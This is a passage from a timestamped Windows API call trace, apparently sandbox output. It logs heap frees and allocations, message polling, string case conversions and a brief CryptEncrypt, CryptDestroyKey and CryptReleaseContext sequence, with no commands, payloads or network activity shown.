dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.931] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.931] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0265.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.931] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.932] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.932] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.932] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0265.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0265.936] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0265.936] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.937] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.937] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.937] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.937] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.937] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.937] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.937] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.937] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.937] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.937] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.937] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.937] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.937] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.937] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.938] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.938] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.938] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.938] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.938] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.938] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.938] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.938] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.938] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.938] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.938] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.938] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.938] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.938] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.938] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.939] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.939] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.939] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0265.939] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.939] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0265.939] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.939] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.939] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.939] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0265.939] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.939] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0265.939] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0265.939] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.940] CryptDestroyKey (hKey=0xaa58a0) returned 1 [0265.940] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.940] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.940] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.940] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.940] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.940] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.940] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.940] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.940] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.940] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.940] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.940] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.940] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.940] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.941] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.941] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.941] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.941] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.941] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.941] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.941] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.941] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.941] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.941] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.941] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.941] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.941] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.941] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.941] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.942] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.942] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.942] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.942] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.942] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.942] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.942] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.942] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.942] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.942] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.942] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.943] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.943] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.943] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.943] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.943] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.943] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.943] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.943] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.943] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.943] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.943] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.943] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.943] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.943] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0265.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0265.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 